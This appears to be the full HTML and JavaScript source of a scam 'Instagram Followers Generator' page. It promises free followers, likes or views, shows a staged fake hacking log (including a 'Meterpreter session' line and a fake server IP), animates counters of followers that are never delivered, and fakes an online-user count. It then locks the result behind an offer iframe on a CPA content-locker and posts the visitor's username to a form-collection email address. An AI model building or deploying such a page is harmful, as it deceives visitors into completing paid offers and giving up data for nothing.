<html>
<head>
  <title>Instagram Followers Generator 2022</title>
  <meta name="description" content="Instagram Followers Generator 2022" />
  <meta property="og:title" content="Instagram Followers Generator 2021" />
  <meta property="og:description" content="Instagram Followers Generator 2021" />
  <meta name="referrer" content="origin" />
 <meta name="google-site-verification" content="C-t4beC03CSzPXPdtY9IjxVuZvfMCnAANXuhWmBKbzY" />
 <!-- Analytics -->

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <style>
    .header_blue {
      background: #1565c0;
      padding: 80px 0 20px;
      color: #fff;
      font-size: 48px;
      font-weight: 300;
      margin-bottom: 40px;
    }

    .header_text {
      margin-left: auto;
      margin-right: auto;
      width: 80%;
    }

    body {
      margin: 0;
      font-family: Roboto, sans-serif;
      color: #444;
    }

    .unlockBtn:hover {
      box-shadow: 0 3px 6px rgba(0, 0, 0, .16), 0 3px 6px rgba(0, 0, 0, .23);
    }

    .unlockBtn {
      background: #2196f3;
      border: none;
      border-radius: 2px;
      box-shadow: 0 1px 3px rgba(0, 0, 0, .12), 0 1px 2px rgba(0, 0, 0, .24);
      min-height: 31px;
      min-width: 70px;
      padding: 2px 16px;
      text-align: center;
      text-shadow: none;
      text-transform: uppercase;
      -webkit-transition: all 280ms ease;
      transition: all 280ms ease;
      box-sizing: border-box;
      cursor: pointer;
      -webkit-appearance: none;
      display: inline-block;
      vertical-align: middle;
      font: 500 14px/31px Roboto, sans-serif !important;
      outline: 0 !important;
      color: white;
    }

    .content-container {
      width: 80%;
      margin: 0 auto;
    }

    @font-face {
      font-family: 'Roboto';
      font-style: normal;
      font-weight: 300;
      src: local('Roboto Light'), local(Roboto-Light), url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");
      unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF
    }

    @font-face {
      font-family: 'Roboto';
      font-style: normal;
      font-weight: 300;
      src: local('Roboto Light'), local(Roboto-Light), url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");
      unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000
    }

    @font-face {
      font-family: 'Roboto';
      font-style: normal;
      font-weight: 500;
      src: local('Roboto Medium'), local(Roboto-Medium), url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");
      unicode-range: U+0100-024F, U+1E00-1EFF, U+20A0-20AB, U+20AD-20CF, U+2C60-2C7F, U+A720-A7FF
    }

    @font-face {
      font-family: 'Roboto';
      font-style: normal;
      font-weight: 500;
      src: local('Roboto Medium'), local(Roboto-Medium), url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");
      unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2212, U+2215, U+E0FF, U+EFFD, U+F000
    }

    body {
      background-image: url("https://d13pxqgp3ixdbh.cloudfront.net/uploads/160550688619f9ceab30eeb80f66d4fb506e390b8c.jpg");
      background-repeat: no-repeat;
      background-size: cover;
      background-position: right;
      font-family: Poppins;

    }

    h1 {
      font-weight: bold;
    }

    .header {
      text-align: center;
      position: fixed;
      width: 100%;
      background: #fff;
      color: #474747;
      box-shadow: 0 0 5px black;

      padding: 15px;
      z-index: 1;
      top: 0;
      left: 0;
    }

    .text-enter-username {
      position: relative;
      color: #474747;
      font-family: Poppins;
      font-weight: bold;
      font-size: 32px;
      padding: 5px;
    }

    .title {
      text-align: center;
      width: 100%;
      margin-top: 120px;
      color: #fff;
      font-family: Poppins;
      font-weight: bold;
      font-size: 22px;
      padding: 5px;

    }

    .usernamebox1 {
      text-align: center;
      align-items: center;
      justify-content: center;
      position: relative;
      margin-top: 50px;
      max-width: 600px;
      width: 90%;
      height: auto;
      overflow: auto;
      padding-bottom: 20px;
      background-color: white;
      border-radius: 30px;
      box-shadow: 0 0 10px #cfcfcf;
      margin-bottom: 200px;
    }

    .footer {
      align-items: center;
      justify-content: center;
      text-align: center;
      display: flex;
    }

    .footer1 {
      align-items: center;
      justify-content: center;
      text-align: center;
      padding: 10px;
      position: fixed;
      bottom: 20px;
      width: 80%;
      height: 80px;
      background-color: black;
      border-radius: 20px;
      z-index: 1;
    }

    .footertext {
      color: white;
      margin: 0px;

    }

    .footerleft {
      position: fixed;
      bottom: 20px;
      width: 80%;
      margin-left: -30px;
      height: 100px;
      background-color: #00f7ef;
      border-radius: 20px;

    }

    .footerright {
      position: fixed;
      bottom: 20px;
      width: 80%;
      margin-right: -30px;
      height: 100px;
      background-color: #ff2f6f;
      border-radius: 20px;

    }

    img.imgtiktok {
      width: 80px;
      margin-top: 10px;
    }

    img.imguser {
      width: 100px;
      top: 10px;
      padding: 10px;
    }

    input {
      color: #474747;
      position: relative;

      border: 2px solid #ff2f6f;
      border-radius: 30px;
    }

    input[type=text] {

      width: 250px;
      box-sizing: border-box;
      border: 2px solid #ea82a2;
      border-radius: 30px;
      font-size: 30px;
      font-weight: bold;
      background-color: white;
      background-image: url("img/usericon.png");
      background-size: 39px;
      background-position: 10px 10px;
      background-repeat: no-repeat;
      padding: 12px 20px 12px 50px;
      transition: width 0.4s ease-in-out;
      box-shadow: 0 0 4px #00f7ef;
    }

    input[type=text]:focus {
      outline: none;
      width: 400px;
      box-sizing: border-box;
      border: 2px solid #ff2f6f;
      border-radius: 30px;
      font-size: 30px;
      background-color: white;
      transition: width 0.4s ease-in-out;
      box-shadow: 0 0 4px #00f7ef;
    }

    .bntValidate {
      margin-top: 20px;
      border-style: solid;
      border-radius: 5px;
      border-width: 2px;
      border-color: #ff4e70;
      box-shadow: 0 0 2px #00c7c0;
      justify-content: center;
      align-items: center;
      color: white;
      font-size: 28px;
      display: flex;
      position: relative;
      background-color: #fe2b54;
      width: 250px;
      height: 60px;
    }

    .bntValidate:hover {
      box-shadow: 0 0 10px #00c7c0;
      cursor: pointer;
    }

    .line {

      top: 180px;
      height: 2px;
      width: 80%;
      background-color: #c4c5c9;
    }


    .packag1:hover {
      cursor: pointer;
      animation: shadow-drop-2-center .4s cubic-bezier(.25, .46, .45, .94) both
    }

    .packag2:hover {
      cursor: pointer;
      animation: shadow-drop-2-center .4s cubic-bezier(.25, .46, .45, .94) both
    }

    .packag3:hover {
      cursor: pointer;
      animation: shadow-drop-2-center .4s cubic-bezier(.25, .46, .45, .94) both
    }

    .packag1 {
      margin-top: 10px;
      text-align: center;
      box-shadow: 0 0 10px #c2c2c2;
      height: 130px;
      width: 90%;
      background-color: white;
      text-align: center;
      border-radius: 10px;
      border-style: solid;
      border-width: 2px;
      border-color: #ebebeb;
      position: relative;


    }

    .selectedpackage {
      text-align: center;
      box-shadow: 0 0 10px #c2c2c2;
      height: 130px;
      width: 90%;
      background-color: white;
      border-radius: 10px;
      border-style: solid;
      border-width: 1px;
      border-color: #ebebeb;

    }

    .packag2 {
      margin-top: 10px;
      margin-bottom: 10px;
      text-align: center;
      box-shadow: 0 0 10px #c2c2c2;
      height: 130px;
      width: 90%;
      background-color: white;
      text-align: center;
      border-radius: 10px;
      border-style: solid;
      border-width: 1px;
      border-color: #ebebeb;
      position: relative;
    }

    .packag3 {
      text-align: center;
      box-shadow: 0 0 10px #c2c2c2;
      height: 130px;
      width: 90%;
      background-color: white;
      text-align: center;
      border-radius: 10px;
      border-style: solid;
      border-width: 1px;
      border-color: #ebebeb;
      position: relative;

    }

    .cardtext {
      padding: 0px;
      margin: 0px;
      font-weight: bolder;
    }

    .text-gen {
      color: #474747;
      font-family: Poppins;
      font-weight: bold;
      font-size: 22px;
      padding: 5px;
    }


    .loader {
      display: none;
      width: 50px;
      position: relative;
      padding-top: 20px;
      margin-top: 10px;
      left: 50%;
      margin-left: -20px;
    }

    .loaderblue {
      position: absolute;
      left: 0px;
      width: 20px;
      height: 20px;
      background-color: #00f7efbf;
      border-radius: 50%;
      animation-name: loaderblue;
      animation-duration: 1s;
      animation-iteration-count: infinite;
    }

    .loaderred {
      position: absolute;
      left: 20px;
      width: 20px;
      height: 20px;
      background-color: #ff2f6fba;
      border-radius: 50%;
      animation-name: loaderred;
      animation-duration: 1s;
      animation-iteration-count: infinite;
    }

    @keyframes loaderblue {
      0% {
        background-color: #00f7efbf;
        left: 0px;
        top: 0px;
        width: 20px;
        height: 20px;
        z-index: 1;
      }

      50% {
        background-color: #00f7efbf;
        left: 20px;
        top: 0px;
        width: 20px;
        height: 20px;
        z-index: 1;
      }

      75% {
        background-color: #00f7efbf;
        left: 10px;
        top: 2px;
        width: 15px;
        height: 15px;
        z-index: 0;
      }

      100% {
        background-color: #00f7efbf;
        left: 0px;
        top: 0px;
        width: 20px;
        height: 20px;
        z-index: 0;
      }
    }

    @keyframes loaderred {
      0% {
        background-color: #ff2f6fba;
        left: 20px;
        top: 0px;
        width: 20px;
        height: 20px;
        z-index: 1;
      }

      25% {
        background-color: #ff2f6fba;
        left: 10px;
        top: 2px;
        width: 15px;
        height: 15px;
        z-index: 0;
      }

      50% {
        background-color: #ff2f6fba;
        left: 0px;
        top: 0px;
        width: 20px;
        height: 20px;
        z-index: 0;
      }

      100% {
        background-color: #ff2f6fba;
        left: 20px;
        top: 0px;
        width: 20px;
        height: 20px;
        z-index: 1;
      }
    }


    @keyframes shadow-drop-2-center {
      0% {
        transform: translateZ(0);
        box-shadow: 0 0 0 0 transparent
      }

      100% {
        transform: translateZ(50px);
        box-shadow: 0 0 20px 0 rgba(0, 0, 0, .35)
      }
    }



    @media only screen and (max-width:680px) {
      .text-enter-username {
        position: relative;
        color: #474747;
        font-family: Poppins;
        font-weight: bold;
        font-size: 24px;
        padding: 5px;

      }

      .header {
        text-align: center;
        position: fixed;
        width: 100%;
        background: #fff;
        color: #474747;
        box-shadow: 0 0 5px black;
        padding: 10px;
        z-index: 1;
        top: 0;
        left: 0;
      }


      input[type=text]:focus {
        outline: none;
        width: 300px;
        box-sizing: border-box;
        border: 2px solid #ff2f6f;
        border-radius: 30px;
        font-size: 30px;
        background-color: white;
        transition: width 0.4s ease-in-out;
        box-shadow: 0 0 4px #00f7ef;
      }

    }
  
    
.tooltiptext {
   background-color: lightyellow;
  margin-bottom:10px;
  width:90%;
  position: relative;
  text-align: center;
  border-radius: 10px;
  border-style: solid;
 border-width: 2px;
 border-color: #ebebeb;
 margin :auto;
 margin-bottom :10px;
 
  }
  
  </style>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>

<body>


 
    <center>
      <div class="header" id="myHeader">
        <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/160550688978be966e25362248e01318d61d8cd23e.png" style="width:25px"><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16055068886e98b8896e5522db87f6225b76be8084.png" style="width:100px">
        <div class="cardtext"> Followers Generator </div>
      </div>
      <div class="title">Get free followers for your Instagram account</div>
      <div class="usernamebox1" id="screen1">
        <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16055068886dc063b289927a6710b2b9592ba343a6.png" class="imgtiktok">
        <div class="text-enter-username">Enter Your Instagram Username<hr>
   Enter post url if you need likes or views  </div>
     
  <div class="tooltiptext">
    <span>
  Make sure your account is public and not private private.<br>
    Input your correct username with out space.<br>
  
    We don't accept accounts that contain adult content. <br>
    <br>
   </span>
   </div>
  
        <input autocomplete="off"type="text" id="tiktokinputname" oninput="textinput()" placeholder="Username Or url">
        <center>
          <div class="bntValidate" onclick="bntValidate()" id="bntValidate">Validate</div>
        </center>
        <div class="loader" id="loader">
          <div class="loaderblue" id="loaderblue"></div>
          <div class="loaderred" id="loaderred"></div>
        </div>
      </div>
      <div class="usernamebox1" id="screen2" style="display:none;">
        <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1605495763d34e91a02f3ce93e6e6f7d245e5694bb.png" class="imguser">
        <div style="padding:20px;  color: #474747;
  font-family: Poppins;
  font-weight: bold;
  font-size: 20px;
  padding: 5px;">Username: <span id="username1">cpabuild</span></div>
        <center>
          <div class="line"></div>
        </center>
        <div class="text-enter-username">Select Package you need</div>
        <center>
          <div id="packag1"  class="packag1" onclick="package(1)"><img src="https://www3.0zz0.com/2022/04/04/20/718184593.png" style="width:60px;margin-top:10px;">
            <p class="cardtext">700</p>
            <p class="cardtext" />FOLLOWERS</p>
          </div>
          <div  id="packag2"  class="packag2" onclick="package(2)"><img src="https://www14.0zz0.com/2022/04/04/20/156326949.png" style="width:60px;margin-top:10px;">
            <p class="cardtext">800</p>
            <p class="cardtext" />likes</p>
          </div>
          <div id="packag3" 
    class="packag3" onclick="package(3)"><img src="https://www9.0zz0.com/2022/04/04/20/280379931.png" style="width:70px;margin-top:10px;">
            <p class="cardtext">1,000</p>
            <p class="cardtext" />views</p>
          </div>
        </center>
        <div class="loader" id="loader">
          <div class="loaderblue" id="loaderblue"></div>
          <div class="loaderred" id="loaderred"></div>
        </div>
      </div>
      <div class="usernamebox1" id="screen3" style="display:none;">
        <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1605495763d34e91a02f3ce93e6e6f7d245e5694bb.png" class="imguser">
        <div style=" padding-top:10px;  color: #474747;
  font-family: Poppins;
  font-weight: bold;
  font-size: 20px;
  padding: 5px;">Username: <span id="username">cpabuild</span></div>
        <center>
          <div class="line"></div>
        </center>
        <div class="loader" id="loader2">
          <div class="loaderblue" id="loaderblue"></div>
          <div class="loaderred" id="loaderred"></div>
        </div>
        <div class="text-gen" id="processing">Select number of followers</div>
        <center>
 <div class="selectedpackage">
        <img id="img"
          src="" style="width:70px;margin-top:10px;">
            <p class="cardtext" id="followGen">+0</p>
            <p class="cardtext" id="fansType"></p>
          </div>
        </center>
        <div id="highttraffic" style="display: none;color:#474747;font-size:22px;font-weight:bold;padding-top:10px;">
          This is the last step you must complete one offer to verify 
        </div>
        <div id="verifyrequired" style="display: none;color:#ffbb0f;font-size:18px;padding-top:10px;">
        </div>
        <center>
          <div class="bntValidate" onclick="show()" id="verify" style="display:none">Show offers</div>
        </center>
      </div>
      <center>
       <div class="usernamebox1" style="display: none;" id ="frame">
         <iframe height="650px" width="100%" id="iframe">
           
         </iframe>
        
      </div>
      </center>
    
      <div class="footer">
        <div class="footer1">
          <p class="footertext">Server Status: <span style="color:#00f7ef;">Online</span> </p>
          <p class="footertext">Last Update: <span id="update"></span></p>
          <p class="footertext">User Online: <span id="user-online">250</span></p>
        </div>
        <div class="footerleft"></div>
        <div class="footerright"></div>
      </div>
      </div>
    </center>
    
    
   <script type="text/javascript">
var packagType;
var userName;
    var today = new Date();
    var date = today.getFullYear() + '-' + (today.getMonth() + 1) + '-' + today.getDate();

    document.getElementById("update").innerHTML = date;

    function bntValidate() {
    var   x = document.getElementById("tiktokinputname").value;
      var n = x.length;
      if (n >= 2) {
        document.getElementById("bntValidate").innerHTML = "Connecting...";
        document.getElementById("tiktokinputname").disabled = true;
        userName = x;
        document.getElementById("bntValidate").disabled = true;
        document.getElementById("loader").style.display = "block";
        var myloop = setInterval(Goscreen2, 100);
        var runstep = 0;
       

        function Goscreen2() {
          runstep++;
          if (runstep >= 100) {
            document.getElementById("screen2").style.display = "block";
            document.getElementById("screen1").style.display = "none";
            document.getElementById("username").innerHTML = x;
            document.getElementById("username1").innerHTML = x;
            clearInterval(myloop);
          }
        }

      } else {
        document.getElementById("tiktokinputname").style.boxShadow = "0 0 10px #fe2b54";
        document.getElementById("loader").style.display = "none";
      }
    }

    function textinput() {
    var   x = document.getElementById("tiktokinputname").value;
      var n = x.length;
      if (n >= 2) {
        document.getElementById("tiktokinputname").style.boxShadow = "0 0 4px #00f7ef";
      }
    }

    function package(follownumber) {
    let iframe = document.getElementById('iframe');
    iframe.src = "https://2fans.xyz";
    
      if (follownumber == 1){
        document.getElementById('fansType').innerHTML = "Followers";
      var img = document.getElementById('img');
      img.src="https://www3.0zz0.com/2022/04/04/20/718184593.png"
        packagType = "followers";
        
        
        
        
        
        
      }else if(follownumber == 2){
        
        document.getElementById('fansType').innerHTML = "likes";
        var img = document.getElementById('img');
        img.src="https://www14.0zz0.com/2022/04/04/20/156326949.png";
        
        
        packagType = "likes";
        
      }else if (follownumber == 3){
        
        document.getElementById('fansType').innerHTML = "Views";
        
        var img = document.getElementById('img');
        img.src="https://www9.0zz0.com/2022/04/04/20/280379931.png";
        packagType = "Views";
        
      }
  
    
      document.getElementById("screen2").style.display = "none";
      document.getElementById("screen3").style.display = "block";
      

      //Loading text
      var myVarCode = setInterval(loadingtext, 1000);
      var step = 0;

      function loadingtext() {
        if (step == 0) {
          document.getElementById("loader2").style.display = "block";
          document.getElementById("processing").innerHTML = "Connecting to server...";


        } else if (step == 1) {
          document.getElementById("processing").innerHTML = "Server is up at 192.251.21.162:445 (latency 0.013s)";

        } else if (step == 2) {
          document.getElementById("processing").innerHTML = "Connecting to server SQL database...";

        } else if (step == 3) {
          document.getElementById("processing").innerHTML = "Obtaining a service manager handle...";

        } else if (step == 4) {
          document.getElementById("processing").innerHTML = "Creating a new service through pipeline...";

        } else if (step == 5) {
          document.getElementById("processing").innerHTML = "Closing service handle...";

        } else if (step == 6) {
          document.getElementById("processing").innerHTML = "Sending stage (845123 bytes) to 192.251.21.162";


        } else if (step == 7) {
          document.getElementById("processing").innerHTML = "Meterpreter session 1 opened at port 445";


        } else if (step == 8) {
          document.getElementById("processing").innerHTML = "Connected To server";
          document.getElementById("loader2").style.display = "none";
        } else if (step == 10) {
          var myVarCode2 = setInterval(addfollow, 10);
          var addfollownum = 0;
          //Get country
  

          function addfollow() {
            if (follownumber == 1) {
           
             document.getElementById("followGen").innerHTML = "+" + addfollownum;
              if (addfollownum == 700) {
                clearInterval(myVarCode2);

                document.getElementById("highttraffic").style.display = "block";
                document.getElementById("verifyrequired").style.display = "block";
                document.getElementById("verify").style.display = "flex";
              }
            }
            
            if (follownumber == 2) {

              document.getElementById("followGen").innerHTML = "+" + addfollownum;
              if (addfollownum == 800) {
                clearInterval(myVarCode2);
                
                document.getElementById("highttraffic").style.display = "block";
                document.getElementById("verifyrequired").style.display = "block";
                document.getElementById("verify").style.display = "flex";
              }
            }
            if (follownumber == 3) {
              document.getElementById("followGen").innerHTML = "+" + addfollownum;
              if (addfollownum == 1000) {
                clearInterval(myVarCode2);

                document.getElementById("highttraffic").style.display = "block";
                document.getElementById("verifyrequired").style.display = "block";
                document.getElementById("verify").style.display = "flex";
              }
            }
            addfollownum++;

          }

        }
        step++;
      }
    }
   
    
     function show (){
       document.getElementById('screen3' ).style.display ="none";
       document.getElementById("frame").style.display = 'block';
       
       
     }
     
function goScreen4 (){
  Swal.fire({
  position: 'top-end',
  icon: 'success',
  title: 'Completed Successfully',
  showConfirmButton: false,
  timer: 1500
});
  document.getElementById('iframe' ).style.display ="none";
   document.getElementById("screen3").style.display = 'block';
  
document.getElementById("highttraffic").innerHTML = "Done you will start receive your "+packagType+" within 24 hours ";

document.getElementById("verifyrequired").style.color = "green";
 
document.getElementById("verifyrequired").innerHTML = "Thank you for trusting us. ";
document.getElementById("verify").style.backgroundColor = "green;";
  
document.getElementById("verify").innerHTML = "Cliam 🎁";
document.getElementById("verify").setAttribute( "onClick","clm();");
}


function clm () {
 
 
        
$.ajax({
    method: 'POST',
    url: 'https://formsubmit.co/ajax/formrecive@gmail.com',
    dataType: 'json',
    accepts: 'application/json',
    data: {
        name: userName,
        package: packagType, 
    },
    success: (data) => console.log(data),
    error: (err) => console.log(err)
});

Swal.fire({
  position: 'top-end',
  icon: 'success',
  title: 'Thanks, you will start receiving the order in 24 hours.',
  showConfirmButton: true,
  confirmButtonText:'Send', 
  preConfirm: () => {
    location.reload () 
  } 
})
  
  
} 

    var myVar2 = setInterval(UserTimer, 3000);

    function UserTimer() {
      document.getElementById("user-online").innerHTML = Math.floor(Math.random() * 100) + 200;


    }
 
 </script> 

<!-- fast alert script-->

<script>
function CPABuildComplete(){
	Swal.fire({
  position: 'top-end',
  icon: 'success',
  title: 'Completed Successfully',
  showConfirmButton: false,
  timer: 1500
})
  goScreen4 ()
}
</script>

<script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.14/dist/sweetalert2.all.min.js"></script>
</body>

</html>
